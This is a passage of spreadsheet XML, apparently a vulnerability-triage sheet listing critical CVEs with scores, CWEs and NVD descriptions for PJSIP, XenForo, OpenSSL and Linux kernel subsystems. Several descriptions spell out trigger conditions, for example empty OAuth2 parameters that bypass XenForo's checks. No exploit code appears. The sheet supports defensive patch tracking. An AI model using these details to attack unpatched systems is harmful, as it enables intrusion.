          <t>CWE-1392</t>
        </is>
      </c>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>An example environment-configuration file for a bundled inventory-management component ships with a fixed, publicly-known administrative password. A deployment that copies this example file into active configuration without running the setup routine that regenerates credentials will expose that component's administrative interface to anyone aware of the default value.</t>
        </is>
      </c>
      <c r="S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90456</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57162</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit a1b707c, a stack buffer overflow exists in the SRTP/SDES media transport when processing a=crypto attributes during SDP offer/answer (sdes_encode_sdp() in transport_srtp_sdes.c). This affects applications with SRTP enabled (use_srtp optional or mandatory, using SDES keying). During media negotiation, the crypto attributes from the remote SDP are collected into a fixed-size array without bounding their number; a remote peer that includes an excessive number of a=crypto attributes in a single media description can write past the end of that array on the stack. This is reachable from an incoming SIP INVITE during offer/answer, before application-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. Applications that do not enable SRTP are not affected. This issue has been patched via commit a1b707c.</t>
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57162</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57163</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit c4a151a, a stack buffer overflow exists in the GnuTLS TLS backend when parsing the Subject Alternative Name extension of a peer certificate (tls_cert_get_info() in ssl_sock_gtls.c). Only GnuTLS builds are affected (--with-gnutls); OpenSSL and Apple SecureTransport/Network.framework builds are not affected. While extracting certificate information after a TLS handshake, an incorrect buffer-size value can cause an oversized SubjectAltName entry to be written past the end of a fixed-size stack buffer. A network-positioned attacker presenting a crafted certificate — a malicious server to a connecting client, or a malicious client to a server that requests certificates — can trigger this during the TLS handshake, before any SIP-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. This issue has been patched via commit c4a151a.</t>
        </is>
      </c>
      <c r="S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57163</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73309</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authentication bypass vulnerability in the OAuth2 token endpoint that allows unauthenticated attackers to obtain valid token pairs by submitting empty values for client_secret and code_verifier parameters. Attackers can exploit PHP truthy evaluation logic, which treats empty strings as false and skips client secret validation and PKCE code verifier validation, to exchange a valid authorization code for a token pair without proving client identity or holding the PKCE commitment.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73311</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an OAuth2 authorization code reuse vulnerability that allows attackers to obtain unauthorized token pairs by submitting a previously used authorization code. Attackers can exploit the failure to invalidate or mark authorization codes as consumed after initial token issuance to receive an independent token pair for the same user and scopes, bypassing the single-use guarantee of the OAuth2 authorization code flow.</t>
        </is>
      </c>
      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73312</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a refresh token replay vulnerability that allows attackers to reuse a refresh token multiple times by exploiting the failure to mark tokens as consumed when the parent access token has expired. Attackers can repeatedly submit the same refresh token to generate additional independent token pairs, achieving persistent unauthorized access for the token's full lifetime.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75803</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>Issue summary: ChaCha20-Poly1305 and AES-OCB decryption with an empty
ciphertext can report success without verifying the supplied authentication
tag when the operation is finalized by calling the EVP_Cipher() function.
Impact summary: Applications calling EVP_Cipher() on an empty ciphertext and
expecting the call to check the AEAD tag may accept forged messages.
CWE: CWE-354 (Improper Validation of Integrity Check Value)
Description: The EVP_Cipher() API call for AEAD ciphers behaves like a one
shot encryption and decryption call. It also verifies the AEAD tag after the
decryption operation. However for AES-OCB and ChaCha20-Poly1305 ciphers
it skipped the AEAD tag verification when an empty ciphertext was passed to
the function. The callers of this function might believe that a successful
return indicates a valid AEAD tag for these ciphers, even when that has not
truly been validated in this case.
FIPS impact: no
The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this CVE
as the affected algorithms are not FIPS approved and thus not implemented
in the FIPS module.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75803</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80945</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: iaa - unmap dst before software fallback on decompress
On a hardware analytics error, decompress retries through the software
fallback, which writes req-&gt;dst with the CPU while it is still mapped
DMA_FROM_DEVICE. With SWIOTLB active the later dma_unmap_sg() copies the
stale bounce buffer over req-&gt;dst, corrupting the result.
Unmap before the fallback runs. The async path unmaps inline; the sync
path signals the retry with -EAGAIN so iaa_comp_adecompress() runs the
fallback after unmapping.</t>
        </is>
      </c>
      <c r="S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80945</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89532</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Fix pcl_for_each_segment for empty chunks
When a parsed chunk list contains a chunk whose ch_segcount is zero,
pcl_for_each_segment computes its inclusive upper bound as
&amp;chunk-&gt;ch_segments[ch_segcount - 1]. ch_segcount is u32, so the
subtraction wraps to 0xFFFFFFFF and the bound lands far past the
ch_segments flex array. The loop body then walks unrelated memory at
sizeof(struct svc_rdma_segment) stride until it faults.
A zero-segcount chunk is reachable from the wire:
xdr_check_write_chunk() only rejects segcount values greater than
rc_maxpages, and pcl_alloc_write() links a freshly allocated chunk
onto rc_write_pcl/rc_reply_pcl before its segment-fill loop runs,
so a Write or Reply chunk advertising zero segments leaves
ch_segcount == 0 on the list. When the transport has negotiated
Send-With-Invalidate, svc_rdma_get_inv_rkey() iterates all four
PCLs with pcl_for_each_segment and dereferences segment-&gt;rs_handle
on each iteration, turning the underflow into an out-of-bounds read
and a general protection fault.
    xdr_check_write_list / xdr_check_reply_chunk
      pcl_alloc_write()
        chunk = pcl_alloc_chunk(...)  /* ch_segcount = 0 */
        list_add_tail(&amp;chunk-&gt;ch_list, &amp;pcl-&gt;cl_chunks)
        /* fill loop iterates zero times for wire segcount 0 */
    svc_rdma_get_inv_rkey()
      pcl_for_each_chunk(rc_write_pcl)
        pcl_for_each_segment(segment, chunk)
          pos &lt;= &amp;ch_segments[0u - 1u]  /* 0xFFFFFFFF */
          segment-&gt;rs_handle            /* OOB read -&gt; GPF */
Fix by switching the macro to a half-open upper bound that uses
ch_segcount directly. For ch_segcount == 0 the loop start equals the
loop end and the body is skipped; for ch_segcount &gt; 0 the iteration
range is unchanged. All six existing call sites in
net/sunrpc/xprtrdma/svc_rdma_recvfrom.c and
net/sunrpc/xprtrdma/svc_rdma_rw.c remain correct under the new bound,
so no caller changes are needed.</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89532</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89537</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Reject short RFC 4121 MIC tokens in gss_krb5_verify_mic_v2
gss_krb5_verify_mic_v2() reads the token ID at ptr[0..1], the flags
byte at ptr[2], and padding at ptr[3..7], then passes
ptr + GSS_KRB5_TOK_HDR_LEN and cksum_len to gss_krb5_mic_build_sg().
None of these accesses check read_token-&gt;len first.
The minimum safe token size is GSS_KRB5_TOK_HDR_LEN (16) plus
ctx-&gt;krb5e-&gt;cksum_len (12-24, depending on the enctype).  All callers
accept shorter tokens from the wire:
 - gss_unwrap_resp_integ() enforces only an upper bound
   (offset + len &lt;= rcv_buf-&gt;len) before allocating
   mic.data = kmalloc(len) and passing it to gss_verify_mic().
   A malicious NFS server can therefore supply a short checksum
   opaque, producing a small slab allocation that the Kerberos MIC
   verifier reads past.
 - gss_validate() enforces only len &lt;= RPC_MAX_AUTH_SIZE (400)
   before passing the wire-supplied length to
   gss_validate_seqno_mic(), which constructs a mic xdr_netobj
   and calls gss_verify_mic().
 - svcauth_gss_verify_header() enforces only
   checksum.len &gt;= XDR_UNIT (4 bytes) before dispatching to
   gss_verify_mic().
 - svcauth_gss_unwrap_integ() checks only that the checksum fits
   in gsd-&gt;gsd_scratch.
Add a length guard at the top of gss_krb5_verify_mic_v2(), before any
ptr[] access or scatterlist construction.  Well-formed MIC tokens from
gss_krb5_get_mic_v2() already have exactly GSS_KRB5_TOK_HDR_LEN +
cksum_len bytes, so valid traffic is unaffected.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89537</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89630</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: restore the data_offset bound in is_valid_oplock_break()
Commit 83bfbd0bb902 ("cifs: Remove the RFC1002 header from smb_hdr")
changed the quantity this bound is measured against.  It used to be
srv-&gt;total_read minus the 4-byte RFC1002 preamble that total_read then
included, so it was the SMB message length.  The same commit stopped
counting the preamble, and the mechanical substitution to
srv-&gt;total_read - srv-&gt;pdu_size left an expression that is identically
zero: standard_receive3() reads MID_HEADER_SIZE() bytes and then exactly
pdu_length - MID_HEADER_SIZE() more, adding both to total_read.
len is therefore 0, the subtraction below it wraps, and no __u32
DataOffset can exceed the result, so the check from commit 097f5863b1a0
("cifs: read overflow in is_valid_oplock_break()") no longer rejects
anything.  Use total_read, which is now the message length on its own.</t>
        </is>
      </c>
      <c r="S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89630</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89631</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: reject a tree connect response whose byte count is too small
CIFSTCon() bounds its strnlen() over the byte area with the server's
ByteCount minus two, which for ByteCount 0 or 1 goes negative as an int
and converts to a huge size_t.  The later subtraction wraps the __u16
bytes_left, and that is what bounds cifs_strndup_from_utf16(): a bound of
up to 65535 against a ~16 KB cifs_req_poolp object runs off the end of the
slab object, and the bytes reach userspace through tcon-&gt;nativeFileSystem
in /proc/fs/cifs/DebugData.
Reject a byte area too small for what the parser consumes.  Two bytes is
the least it can consume, and no conformant response carries fewer.  The
new trace point is the 129th smb_eio_trace entry, which __mode(byte)
cannot represent, so the attribute goes with it.</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89631</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89634</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix ALIGN() overflow in symlink_data() error context loop
The check added by commit 7d9a7f1f96cd ("smb/client: fix possible
infinite loop and oob read in symlink_data()") compared the post-ALIGN
length against the remaining buffer, but ALIGN() itself can overflow:
for ErrorDataLength near UINT32_MAX (e.g. 0xFFFFFFF9), ALIGN(x, 8)
wraps to 0, so the subsequent bounds check passes, and the loop
advances by zero bytes leaving 'p' pointing into stale data.
Fix by checking the raw ErrorDataLength against the remaining space
before applying ALIGN(), then checking again after.  Since raw_len is
bounded by the buffer, raw_len + 7 cannot overflow, so the second check
is an exact post-alignment bounds guard.</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89634</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89649</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: bound xattr value length in __build_xattrs()
__build_xattrs() decodes the MDS-supplied xattr blob one attribute at a
time. For each attribute it reads a 32-bit name length, advances past the
name bytes, reads a 32-bit value length, records the value pointer, and
advances past the value bytes. The two length fields are read with
ceph_decode_32_safe(), but the value bytes themselves are advanced over
with a bare "p += len" and no ceph_decode_need() check that "len" bytes
remain in the blob.
For every attribute except the last, the next iteration's
ceph_decode_32_safe() on the following name length implicitly verifies
that the previous value did not run past the blob end. The final
attribute has no successor, so its decoded value length is never checked
against the blob bounds. A malicious or compromised metadata server can
set the last attribute's value length larger than the bytes actually
present in the blob.
The blob is a dedicated kvmalloc() allocation sized to the wire length
(ceph_buffer_new() in ceph_fill_inode()). __set_xattr() records the
oversized length in xattr-&gt;val_len verbatim, and a later getxattr(2) runs
